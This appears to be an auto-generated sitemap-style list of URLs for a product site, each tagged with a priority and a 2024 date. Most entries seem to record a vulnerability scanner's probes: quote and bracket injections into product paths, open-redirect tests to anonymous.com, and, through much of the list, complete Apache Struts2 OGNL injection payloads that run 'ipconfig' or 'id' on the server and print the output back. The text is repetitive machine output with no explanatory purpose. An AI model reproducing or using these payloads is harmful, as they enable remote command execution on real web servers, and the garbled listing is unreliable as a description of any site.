http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm67265%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem44369?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 